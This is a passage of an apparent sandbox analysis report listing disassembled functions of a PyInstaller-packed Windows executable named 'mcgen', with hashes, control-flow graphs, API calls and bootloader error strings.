                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                    • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                    • Instruction ID: b3ea566682a51e8eb3ed45d42fb5dc2372e038feaf4315717f3b97c8d8ec95b6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78F0A462A1865186F7608F68B4587766358FB85376F040235DB6D436D4DF3CD0488A40
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                    • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                                                    • Instruction ID: e5eb24155a61963c220474134b41d46031fe31647c564cf4bd7aab05120218e5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3802AE21A1D68640FE65AF3E9410279369CAF46BB2F598636EF5DC73D2DE3CE4418302

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 329 7ff6b9f11950-7ff6b9f1198b call 7ff6b9f145b0 332 7ff6b9f11c4e-7ff6b9f11c72 call 7ff6b9f1c5c0 329->332 333 7ff6b9f11991-7ff6b9f119d1 call 7ff6b9f17f80 329->333 338 7ff6b9f119d7-7ff6b9f119e7 call 7ff6b9f20744 333->338 339 7ff6b9f11c3b-7ff6b9f11c3e call 7ff6b9f200bc 333->339 344 7ff6b9f11a08-7ff6b9f11a24 call 7ff6b9f2040c 338->344 345 7ff6b9f119e9-7ff6b9f11a03 call 7ff6b9f24f78 call 7ff6b9f12910 338->345 343 7ff6b9f11c43-7ff6b9f11c4b 339->343 343->332 350 7ff6b9f11a26-7ff6b9f11a40 call 7ff6b9f24f78 call 7ff6b9f12910 344->350 351 7ff6b9f11a45-7ff6b9f11a5a call 7ff6b9f24f98 344->351 345->339 350->339 359 7ff6b9f11a7b-7ff6b9f11afc call 7ff6b9f11c80 * 2 call 7ff6b9f20744 351->359 360 7ff6b9f11a5c-7ff6b9f11a76 call 7ff6b9f24f78 call 7ff6b9f12910 351->360 371 7ff6b9f11b01-7ff6b9f11b14 call 7ff6b9f24fb4 359->371 360->339 374 7ff6b9f11b16-7ff6b9f11b30 call 7ff6b9f24f78 call 7ff6b9f12910 371->374 375 7ff6b9f11b35-7ff6b9f11b4e call 7ff6b9f2040c 371->375 374->339 380 7ff6b9f11b6f-7ff6b9f11b8b call 7ff6b9f20180 375->380 381 7ff6b9f11b50-7ff6b9f11b6a call 7ff6b9f24f78 call 7ff6b9f12910 375->381 389 7ff6b9f11b8d-7ff6b9f11b99 call 7ff6b9f12710 380->389 390 7ff6b9f11b9e-7ff6b9f11bac 380->390 381->339 389->339 390->339 393 7ff6b9f11bb2-7ff6b9f11bb9 390->393 395 7ff6b9f11bc1-7ff6b9f11bc7 393->395 396 7ff6b9f11bc9-7ff6b9f11bd6 395->396 397 7ff6b9f11be0-7ff6b9f11bef 395->397 398 7ff6b9f11bf1-7ff6b9f11bfa 396->398 397->397 397->398 399 7ff6b9f11bfc-7ff6b9f11bff 398->399 400 7ff6b9f11c0f 398->400 399->400 401 7ff6b9f11c01-7ff6b9f11c04 399->401 402 7ff6b9f11c11-7ff6b9f11c24 400->402 401->400 403 7ff6b9f11c06-7ff6b9f11c09 401->403 404 7ff6b9f11c26 402->404 405 7ff6b9f11c2d-7ff6b9f11c39 402->405 403->400 406 7ff6b9f11c0b-7ff6b9f11c0d 403->406 404->405 405->339 405->395 406->402
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F17F80: _fread_nolock.LIBCMT ref: 00007FF6B9F1802A
                                                                                                                                                                                                                                                                    • _fread_nolock.LIBCMT ref: 00007FF6B9F11A1B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F12910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B9F11B6A), ref: 00007FF6B9F1295E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                    • Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                                                    • Instruction ID: 447ad0c857d12893f861ae050949b50043e070b3e72dfc6b881d56536d27eec7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E38181B1B1C6A285EB20DF28D0507F933A8AF457A6F448031EB8DC7785DE3CE5858781

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 407 7ff6b9f11600-7ff6b9f11611 408 7ff6b9f11637-7ff6b9f11651 call 7ff6b9f145b0 407->408 409 7ff6b9f11613-7ff6b9f1161c call 7ff6b9f11050 407->409 416 7ff6b9f11682-7ff6b9f1169c call 7ff6b9f145b0 408->416 417 7ff6b9f11653-7ff6b9f11681 call 7ff6b9f24f78 call 7ff6b9f12910 408->417 414 7ff6b9f1162e-7ff6b9f11636 409->414 415 7ff6b9f1161e-7ff6b9f11629 call 7ff6b9f12710 409->415 415->414 424 7ff6b9f116b8-7ff6b9f116cf call 7ff6b9f20744 416->424 425 7ff6b9f1169e-7ff6b9f116b3 call 7ff6b9f12710 416->425 432 7ff6b9f116f9-7ff6b9f116fd 424->432 433 7ff6b9f116d1-7ff6b9f116f4 call 7ff6b9f24f78 call 7ff6b9f12910 424->433 431 7ff6b9f11821-7ff6b9f11824 call 7ff6b9f200bc 425->431 438 7ff6b9f11829-7ff6b9f1183b 431->438 436 7ff6b9f11717-7ff6b9f11737 call 7ff6b9f24fb4 432->436 437 7ff6b9f116ff-7ff6b9f1170b call 7ff6b9f11210 432->437 448 7ff6b9f11819-7ff6b9f1181c call 7ff6b9f200bc 433->448 445 7ff6b9f11739-7ff6b9f1175c call 7ff6b9f24f78 call 7ff6b9f12910 436->445 446 7ff6b9f11761-7ff6b9f1176c 436->446 444 7ff6b9f11710-7ff6b9f11712 437->444 444->448 461 7ff6b9f1180f-7ff6b9f11814 445->461 450 7ff6b9f11802-7ff6b9f1180a call 7ff6b9f24fa0 446->450 451 7ff6b9f11772-7ff6b9f11777 446->451 448->431 450->461 454 7ff6b9f11780-7ff6b9f117a2 call 7ff6b9f2040c 451->454 462 7ff6b9f117da-7ff6b9f117e6 call 7ff6b9f24f78 454->462 463 7ff6b9f117a4-7ff6b9f117bc call 7ff6b9f20b4c 454->463 461->448 468 7ff6b9f117ed-7ff6b9f117f8 call 7ff6b9f12910 462->468 469 7ff6b9f117be-7ff6b9f117c1 463->469 470 7ff6b9f117c5-7ff6b9f117d8 call 7ff6b9f24f78 463->470 474 7ff6b9f117fd 468->474 469->454 473 7ff6b9f117c3 469->473 470->468 473->474 474->450
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                    • Opcode ID: 4e7c6c2bdf537de82cf47b22606b231cd0750e3a63fce0541248225687b17467
                                                                                                                                                                                                                                                                    • Instruction ID: c8236246949059d36c82b7279de58d7fef7d326597f3a9475a33e638c7caa2cb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e7c6c2bdf537de82cf47b22606b231cd0750e3a63fce0541248225687b17467
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF51B2A1F0C66382EA209F6994101B96358BF867B6F448531EF1C877D2DF3CE555C781

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(?,?,00000000,00007FF6B9F13CBB), ref: 00007FF6B9F188F4
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6B9F13CBB), ref: 00007FF6B9F188FA
                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6B9F13CBB), ref: 00007FF6B9F1893C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18A20: GetEnvironmentVariableW.KERNEL32(00007FF6B9F1388E), ref: 00007FF6B9F18A57
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B9F18A79
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F282A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F282C1
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F12810: MessageBoxW.USER32 ref: 00007FF6B9F128EA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                    • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                                    • Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                                                    • Instruction ID: 08d95059d384f1dc1ffd40cb67bfd88232592b8b03630c9a4a9baf1b395c565b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D041C651A1C67240FA20AF6DA5512F92299AF8ABF2F804131EF0DC77D6DE3CE505C781

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 599 7ff6b9f11210-7ff6b9f1126d call 7ff6b9f1bdf0 602 7ff6b9f11297-7ff6b9f112af call 7ff6b9f24fb4 599->602 603 7ff6b9f1126f-7ff6b9f11296 call 7ff6b9f12710 599->603 608 7ff6b9f112b1-7ff6b9f112cf call 7ff6b9f24f78 call 7ff6b9f12910 602->608 609 7ff6b9f112d4-7ff6b9f112e4 call 7ff6b9f24fb4 602->609 620 7ff6b9f11439-7ff6b9f1146d call 7ff6b9f1bad0 call 7ff6b9f24fa0 * 2 608->620 615 7ff6b9f112e6-7ff6b9f11304 call 7ff6b9f24f78 call 7ff6b9f12910 609->615 616 7ff6b9f11309-7ff6b9f1131b 609->616 615->620 619 7ff6b9f11320-7ff6b9f11345 call 7ff6b9f2040c 616->619 627 7ff6b9f1134b-7ff6b9f11355 call 7ff6b9f20180 619->627 628 7ff6b9f11431 619->628 627->628 635 7ff6b9f1135b-7ff6b9f11367 627->635 628->620 637 7ff6b9f11370-7ff6b9f11398 call 7ff6b9f1a230 635->637 640 7ff6b9f11416-7ff6b9f1142c call 7ff6b9f12710 637->640 641 7ff6b9f1139a-7ff6b9f1139d 637->641 640->628 642 7ff6b9f1139f-7ff6b9f113a9 641->642 643 7ff6b9f11411 641->643 645 7ff6b9f113ab-7ff6b9f113b9 call 7ff6b9f20b4c 642->645 646 7ff6b9f113d4-7ff6b9f113d7 642->646 643->640 652 7ff6b9f113be-7ff6b9f113c1 645->652 647 7ff6b9f113d9-7ff6b9f113e7 call 7ff6b9f39ea0 646->647 648 7ff6b9f113ea-7ff6b9f113ef 646->648 647->648 648->637 651 7ff6b9f113f5-7ff6b9f113f8 648->651 654 7ff6b9f113fa-7ff6b9f113fd 651->654 655 7ff6b9f1140c-7ff6b9f1140f 651->655 656 7ff6b9f113cf-7ff6b9f113d2 652->656 657 7ff6b9f113c3-7ff6b9f113cd call 7ff6b9f20180 652->657 654->640 658 7ff6b9f113ff-7ff6b9f11407 654->658 655->628 656->640 657->648 657->656 658->619
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                    • Opcode ID: dd90a4479ba71e44dedb97b9a062242b20196015a5516087af12020732465272
                                                                                                                                                                                                                                                                    • Instruction ID: 330fa6b6658db6d64631149d41d55a437fdb89db0e66f1d1ee3f65118d593694
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd90a4479ba71e44dedb97b9a062242b20196015a5516087af12020732465272
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C51E662B0C6A281E6609F29A4103BA6299FF87BB6F548135EF4DC77C5EE3CE505C740

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF6B9F2F11A,?,?,-00000018,00007FF6B9F2ADC3,?,?,?,00007FF6B9F2ACBA,?,?,?,00007FF6B9F25FAE), ref: 00007FF6B9F2EEFC
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF6B9F2F11A,?,?,-00000018,00007FF6B9F2ADC3,?,?,?,00007FF6B9F2ACBA,?,?,?,00007FF6B9F25FAE), ref: 00007FF6B9F2EF08
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                    • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                                    • Instruction ID: 01129e6867d5e58b02c193f84b30a1d13ab4ce8e40ec653a1785b57dd90c329d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26410161B19A5241FB15CF2E9904675369ABF49BF2F994139EE1DCB388EE3CE8058300

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF6B9F13804), ref: 00007FF6B9F136E1
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F13804), ref: 00007FF6B9F136EB
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F12C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12C9E
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F12C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12D63
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F12C50: MessageBoxW.USER32 ref: 00007FF6B9F12D99
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                    • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                    • Instruction ID: 66d2bff721cb20cebdc84adb3389e39dd3063f5024206ae34d429bcf1d9c56b2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121A391B0C66282FA209F29E8113F62258BF493B6F400132EB6DC35D5FE2CE105C780

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 744 7ff6b9f2bacc-7ff6b9f2baf2 745 7ff6b9f2bb0d-7ff6b9f2bb11 744->745 746 7ff6b9f2baf4-7ff6b9f2bb08 call 7ff6b9f24f58 call 7ff6b9f24f78 744->746 747 7ff6b9f2bee7-7ff6b9f2bef3 call 7ff6b9f24f58 call 7ff6b9f24f78 745->747 748 7ff6b9f2bb17-7ff6b9f2bb1e 745->748 760 7ff6b9f2befe 746->760 767 7ff6b9f2bef9 call 7ff6b9f2a950 747->767 748->747 750 7ff6b9f2bb24-7ff6b9f2bb52 748->750 750->747 753 7ff6b9f2bb58-7ff6b9f2bb5f 750->753 756 7ff6b9f2bb78-7ff6b9f2bb7b 753->756 757 7ff6b9f2bb61-7ff6b9f2bb73 call 7ff6b9f24f58 call 7ff6b9f24f78 753->757 763 7ff6b9f2bb81-7ff6b9f2bb87 756->763 764 7ff6b9f2bee3-7ff6b9f2bee5 756->764 757->767 765 7ff6b9f2bf01-7ff6b9f2bf18 760->765 763->764 768 7ff6b9f2bb8d-7ff6b9f2bb90 763->768 764->765 767->760 768->757 771 7ff6b9f2bb92-7ff6b9f2bbb7 768->771 773 7ff6b9f2bbb9-7ff6b9f2bbbb 771->773 774 7ff6b9f2bbea-7ff6b9f2bbf1 771->774 777 7ff6b9f2bbbd-7ff6b9f2bbc4 773->777 778 7ff6b9f2bbe2-7ff6b9f2bbe8 773->778 775 7ff6b9f2bbc6-7ff6b9f2bbdd call 7ff6b9f24f58 call 7ff6b9f24f78 call 7ff6b9f2a950 774->775 776 7ff6b9f2bbf3-7ff6b9f2bc1b call 7ff6b9f2d66c call 7ff6b9f2a9b8 * 2 774->776 806 7ff6b9f2bd70 775->806 809 7ff6b9f2bc38-7ff6b9f2bc63 call 7ff6b9f2c2f4 776->809 810 7ff6b9f2bc1d-7ff6b9f2bc33 call 7ff6b9f24f78 call 7ff6b9f24f58 776->810 777->775 777->778 780 7ff6b9f2bc68-7ff6b9f2bc7f 778->780 783 7ff6b9f2bcfa-7ff6b9f2bd04 call 7ff6b9f3398c 780->783 784 7ff6b9f2bc81-7ff6b9f2bc89 780->784 795 7ff6b9f2bd0a-7ff6b9f2bd1f 783->795 796 7ff6b9f2bd8e 783->796 784->783 788 7ff6b9f2bc8b-7ff6b9f2bc8d 784->788 788->783 792 7ff6b9f2bc8f-7ff6b9f2bca5 788->792 792->783 797 7ff6b9f2bca7-7ff6b9f2bcb3 792->797 795->796 801 7ff6b9f2bd21-7ff6b9f2bd33 GetConsoleMode 795->801 799 7ff6b9f2bd93-7ff6b9f2bdb3 ReadFile 796->799 797->783 802 7ff6b9f2bcb5-7ff6b9f2bcb7 797->802 804 7ff6b9f2bdb9-7ff6b9f2bdc1 799->804 805 7ff6b9f2bead-7ff6b9f2beb6 GetLastError 799->805 801->796 807 7ff6b9f2bd35-7ff6b9f2bd3d 801->807 802->783 808 7ff6b9f2bcb9-7ff6b9f2bcd1 802->808 804->805 812 7ff6b9f2bdc7 804->812 815 7ff6b9f2beb8-7ff6b9f2bece call 